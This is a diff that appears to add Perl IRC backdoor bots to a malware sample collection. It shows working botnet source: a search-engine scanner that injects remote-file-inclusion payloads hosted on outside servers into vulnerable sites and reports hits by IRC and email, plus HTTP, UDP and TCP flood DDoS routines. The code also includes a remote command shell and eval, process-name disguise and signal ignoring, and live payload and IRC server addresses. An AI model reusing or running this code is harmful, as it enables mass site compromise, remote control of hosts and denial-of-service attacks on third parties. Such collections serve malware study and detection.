+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+##############
+## FireBall ##
+##############
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @fireball=fireball($dork);
+push(my @tot, @fireball);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 4F1ire4B1all12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 4F1ire4B1all12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4F1ire4B1all12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4F1ire4B1all12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+#######################
+#End of EXTREMESCANNER# 
+#######################
+
+######################
+#     HTTPFlood      #
+######################
+if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@HTTP-DDOS12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
+my $itime = time;
+my ($cur_time);
+$cur_time = time - $itime;
+while ($2>$cur_time){
+$cur_time = time - $itime;
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+close($socket);
+}
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@HTTP-DDOS12] Attacking done 4 ".$1.".");
+}
+######################
+#  End of HTTPFlood  #
+######################
+
+######################
+#     UDPFlood       #
+######################
+if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@UDP-DDOS12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds.");
+my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+$dtime = 1 if $dtime == 0;
+my %bytes;
+$bytes{igmp} = $2 * $pacotes{igmp};
+$bytes{icmp} = $2 * $pacotes{icmp};
+$bytes{o} = $2 * $pacotes{o};
+$bytes{udp} = $2 * $pacotes{udp};
+$bytes{tcp} = $2 * $pacotes{tcp};
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@UDP-DDOS12] 12Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1.".");
+}
+exit;
+}
+}
+######################
+#  End of Udpflood   #
+######################
+
+
+sub ircase {
+my ($kem, $printl, $case) = @_;
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+if ($case =~ /^rejoin\s+(.*)/) {
+my $chan = $1;
+if ($chan =~ /^(\d+) (.*)/) {
+for (my $ca = 1; $ca <= $1; $ca++ ) {
+p("$2");
+j("$2");
+}
+}
+else {
+p("$chan");
+j("$chan");
+}
+}
+
+if ($case =~ /^op/) {
+op("$printl", "$kem") if $case eq "op";
+my $oarg = substr($case, 3);
+op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^deop/) {
+deop("$printl", "$kem") if $case eq "deop";
+my $oarg = substr($case, 5);
+deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^msg\s+(\S+) (.*)/) {
+msg("$1", "$2");
+}
+
+if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+msg("$2", "$3");
+}
+}
+
+if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+ctcp("$1", "$2");
+}
+
+if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+ctcp("$2", "$3");
+}
+}
+
+if ($case =~ /^nick (.*)/) {
+nick("$1");
+}
+
+if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+conectar("$2", "$1", 6667);
+}
+
+if ($case =~ /^raw (.*)/) {
+sendraw("$1");
+}
+
+if ($case =~ /^eval (.*)/) {
+eval "$1";
+}
+}
+
+
+sub shell {
+my $printl=$_[0];
+my $comando=$_[1];
+if ($comando =~ /cd (.*)/) {
+chdir("$1") || msg("$printl", "No such file or directory");
+return;
+}
+
+elsif ($pid = fork) {
+waitpid($pid, 0);
+}
+else {
+if (fork) {
+exit;
+
+} else {
+my @resp=`$comando 2>&1 3>&1`;
+my $c=0;
+foreach my $linha (@resp) {
+  $c++;
+  chop $linha;
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+  if ($c == "$linas_max") {
+    $c=0;
+    sleep $sleep;
+  }
+}
+exit;
+}
+}
+}
+
+sub tcpflooder {
+my $itime = time;
+my ($cur_time);
+my ($ia,$pa,$proto,$j,$l,$t);
+$ia=inet_aton($_[0]);
+$pa=sockaddr_in($_[1],$ia);
+$ftime=$_[2];
+$proto=getprotobyname('tcp');
+$j=0;$l=0;
+$cur_time = time - $itime;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+socket($t,PF_INET,SOCK_STREAM,$proto);
+connect($t,$pa)||$j--;
+$j++;$l++;
+}
+$l=0;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+shutdown($t,2);
+$l++;
+}
+}
+
+sub udpflooder {
+my $iaddr = inet_aton($_[0]);
+my $msg = 'A' x $_[1];
+my $ftime = $_[2];
+my $cp = 0;
+my (%pacotes);
+$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+return(undef) if $cp == 4;
+my $itime = time;
+my ($cur_time);
+while ( 1 ) {
+for (my $porta = 1;
+$porta <= 65000; $porta++) {
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+
+for (my $pc = 3;
+$pc <= 255;$pc++) {
+next if $pc == 6;
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+}
+}
+last if $cur_time >= $ftime;
+}
+return($cur_time, %pacotes);
+}
+
+sub ctcp {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+
+sub msg {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+return unless $#_ == 1;
+sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+return unless $#_ == 1;
+sendraw("MODE $_[0] +o $_[1]");
+}
+
+sub deop {
+return unless $#_ == 1;
+sendraw("MODE $_[0] -o $_[1]");
+}
+
+sub j {
+&join(@_);
+}
+
+sub join {
+return unless $#_ == 0;
+sendraw("JOIN $_[0]");
+
+}
+sub p { part(@_);
+}
+
+sub part {
+sendraw("PART $_[0]");
+}
+
+sub nick {
+return unless $#_ == 0;
+sendraw("NICK $_[0]");
+}
+
+sub quit {
+sendraw("QUIT :$_[0]");
+}
+
+#####
+# SUBS GOOGLE
+#####
+sub googlet {
+my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk");
+my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK");
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $i (@dominios){
+my @lista = google($i,$key,$lang[$c],$country[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $i=$_[0];
+my $key=$_[1];
+my $lang= $_[2];
+my $country =$_[3];
+for($b=0;$b<=5000;$b+=100){
+my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS AllTheWeb
+#####
+
+sub allthewebt {
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $lang (@lang){
+my @lista = alltheweb($key,$lang[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+
+sub alltheweb(){
+my @lista;
+my $key = $_[0];
+my $lang= $_[1];
+for($b=0;$b<=500;$b+=100){
+my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b);
+my $Res=query($alltheweb);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub standard()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS AOL
+#####
+sub aol(){
+my @lst;
+my $key = $_[0];
+    my $start; 
+    my $num=20; 
+    my $max=100*5; 
+    my $html; 
+    my @result; 
+    for($start=0;$start < $max; $start += $num){ 
+        $html.=&Query("http://search.aol.com/aol/search?query=".$dork."&safesearch=0&count_override=".$num."&page=".$start/$num); 
+    }
+    while($html =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ 
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}
+return @lst;
+}
+
+
+#####
+# SUBS Yahoo
+#####
+sub yahoo(){
+my @lst;
+my $key = $_[0];
+    my $start;
+    my $num=100;
+    my $max=100*10;
+    for($start=0;$start < $max; $start += $num){ 
+        my $Yahoo=("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".key($key)."&results=".$num."&start=".$start); 
+my $Res=query($Yahoo);
+while($Res =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){ 
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS MSN
+#####
+sub msn(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
+my $Res=query($MsN);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if($1 !~ /msn|live/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS ASK
+#####
+sub ask(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS UOL
+#####
+sub uol(){
+my @lst;
+my $key=$_[0];
+my $inizio=1;
+my $pagine=25;
+my $av=1;
+
+while($inizio <= $pagine){
+my $uol="http://busca.uol.com.br/www/index.html?q=".key($key)."&start=$av";
+my $Res=query($uol);
+while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
+my $ok="$1/";
+my @grep=links($ok);
+push(@lst,@grep);
+}
+$av=$av+10;
+$inizio++;
+}
+return @lst;
+}
+
+
+#####
+# SUBS FireBall
+#####
+sub fireball(){
+my $key=$_[0];
+my $inizio=1;
+my $pagine=200;
+my @lst;
+my $av=0;
+while($inizio <= $pagine){
+my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8";
+my $Res=query($fireball);
+while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k="$1/";
+my @grep=links($k);
+push(@lst,@grep);
+}}
+$av=$av+10;
+$inizio++;
+}
+return @lst;
+}
+
+#####
+# SUBS GIGABLAST
+#####
+sub gigablast(){
+my $key=$_[0];
+my @lst;
+my $start; 
+my $max=1000; 
+my $num =10; 
+my @result; 
+
+for($start=0;$start < $max; $start += $num){
+my $giga=("http://www.gigablast.com/search?s=".$num."&q=".$dork);
+my $Res=query($giga);
+while($res =~ m/<span class=\"url\">(.+?)\<\/span>/g){ 
+my $k="$1/";
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}   
+return @unici;
+}
+
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}
+
+}
+
diff --git a/Perl/Backdoor.Perl.IRCBot.af b/Perl/Backdoor.Perl.IRCBot.af
new file mode 100644
index 00000000..87c0e27d
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.af
@@ -0,0 +1,2578 @@
+#
+########################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
+#	Anak
+#       _____
+#      ( ___ )  _____  __  ___  ____  _   _
+#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
+# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
+#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
+#      | |__/ /| (_) || |   | || |   | |_| |
+#      (_____) (_____)(_)   (_)(_)   (_____)
+#
+#              AnakDompu [on] Dalnet й 2008
+#
+#
+########################################################
+
+
+use IO::Socket::INET;
+use HTTP::Request;
+use LWP::UserAgent;
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
+my $processo = $ps[rand scalar @ps];
+my $linas_max='10';
+my $sleep='3';
+my $cmd="http://www.geocities.com/ghanjar.satriani/kontol.txt???";
+my $id="http://www.hanbol.es.kr/id.txt";
+my $spread="http://www.hanbol.es.kr/alls.txt???";
+my $perawan="http://www.hanbol.es.kr/alls.txt???";
+my $idku="http://www.hanbol.es.kr/pbots.txt???";
+my @adms=("klepek_klepek","wisnoee");
+my @canais=("#ponticity");
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+my @nickname = ("AkeZuKa",
+    "AbankSayang",
+    "Sampula",
+    "FuRkaN",
+    "AnakDompu",
+    "SaMaDa",
+    "SaMPeLa",
+    "ShuZuKa",
+    "TalamPa",
+    "Tambora",
+    "Henca",
+    "Hencarasa",
+    "HencaSpy",
+    "SamPuLa");
+my @rname = ("Ketika Rasa Tak Dapat Di UngkaP",
+    "PowereD By AnakDompu",
+    "SeRinG PuTus Cinta",
+    "Aku Mudah Jatuh Cinta",
+    "ModeL Bug1L AnakDompu",
+    "Jpop And JrocK Lyric",
+    "Ketika Rasa Tak Dapat Diungkap Bro",
+    "Percuma Kita Bersama DinDa",
+    "klepek_klepek Memang cakep",
+    "Suka Nonton Movie hentai la",
+    "Lihat Cewek2 Pake tanktop",
+    "Owned By AnakDompu");
+my $nick = $nickname[rand scalar @nickname];
+my $ircname = $nickname[rand scalar @nickname];
+my $realname = $rname[rand scalar @rname];
+$servidor='irc.ardantus.org' unless $servidor;
+my $porta='6667';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+
+#Connect
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Masalah fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+    } else {
+    print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+  my $meunick = $_[0];
+  my $servidor_con = $_[1];
+  my $porta_con = $_[2];
+  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+  PeerPort=>$porta_con) or return(1);
+  if (defined($IRC_socket)) {
+    $IRC_cur_socket = $IRC_socket;
+    $IRC_socket->autoflush(1);
+    $sel_cliente->add($IRC_socket);
+    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+    nick("$meunick");
+    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+    sleep 1;
+  }
+}
+
+my $line_temp;
+while( 1 ) {
+  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+  delete($irc_servers{''}) if (defined($irc_servers{''}));
+  my @ready = $sel_cliente->can_read(0);
+  next unless(@ready);
+  foreach $fh (@ready) {
+    $IRC_cur_socket = $fh;
+    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+    $nread = sysread($fh, $msg, 4096);
+    if ($nread == 0) {
+      $sel_cliente->remove($fh);
+      $fh->close;
+      delete($irc_servers{$fh});
+    }
+    @lines = split (/\n/, $msg);
+    for(my $c=0; $c<= $#lines; $c++) {
+
+      $line = $lines[$c];
+      $line=$line_temp.$line if ($line_temp);
+      $line_temp='';
+      $line =~ s/\r$//;
+      unless ($c == $#lines) {
+        parse("$line");
+        } else {
+        if ($#lines == 0) {
+          parse("$line");
+          } elsif ($lines[$c] =~ /\r$/) {
+          parse("$line");
+          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+          parse("$line");
+          	   } else {
+          	               $line_temp = $line;
+        }
+      }
+    }
+  }
+}
+
+sub parse {
+  my $servarg = shift;
+  if ($servarg =~ /^PING \:(.*)/) {
+    sendraw("PONG :$1");
+    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+    if ($args =~ /^\001VERSION\001$/) {
+      	 notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
+    }
+    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+    if ($onde eq "$meunick"){
+    shell("$pn", "$args");
+  }
+
+#End of Connect
+
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#      PREFIX        #
+######################
+
+  if ($args =~ /^(\Q$meunick\E|\!xan)\s+(.*)/ ) {
+    my $natrix = $1;
+    my $arg = $2;
+    if ($arg =~ /^\!(.*)/) {
+      ircase("$pn","$onde","$1") unless ($natrix eq "!xan" and $arg =~ /^\!nick/);
+      } elsif ($arg =~ /^\@(.*)/) {
+      $ondep = $onde;
+      $ondep = $pn if $onde eq $meunick;
+      bfunc("$ondep","$1");
+      } else {
+      shell("$onde", "$arg");
+    }
+  }
+}
+}
+######################
+#   End of PREFIX    #
+######################
+
+elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+if (lc($1) eq lc($meunick)) {
+  $meunick=$4;
+  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+}
+} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+nick("$meunick".int rand(999999));
+} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+$meunick = $2;
+$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+foreach my $canal (@canais) {
+  sendraw("JOIN $canal ddosit");
+}
+}
+}
+
+sub bfunc {
+my $printl = $_[0];
+my $funcarg = $_[1];
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+  exit;
+} else {
+
+######################
+#       Help         #
+######################
+
+if ($funcarg =~ /^help/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Select the function you want help for");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4ddos");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4scan");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4backconnect");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4portscanner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Or if you want too know all the commands type:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4commands");
+
+}
+
+if ($funcarg =~ /^ddos/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There are 3 DDossers in this bot");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 UDPFlood, HTTPFlood and TCPFlood");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4httpflood <site> <time>");
+
+}
+
+if ($funcarg =~ /^scanscan/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot also contains a scan Scanner.");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4scan <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can find strings here : http://www.xshqiptaretx.org/strings.txt ");
+
+}
+
+if ($funcarg =~ /^backconnect/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You use backconnect like this :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4back <ip><port>");
+}
+
+if ($funcarg =~ /^shell/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot has a integrated shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use it in private but also public in the channel");
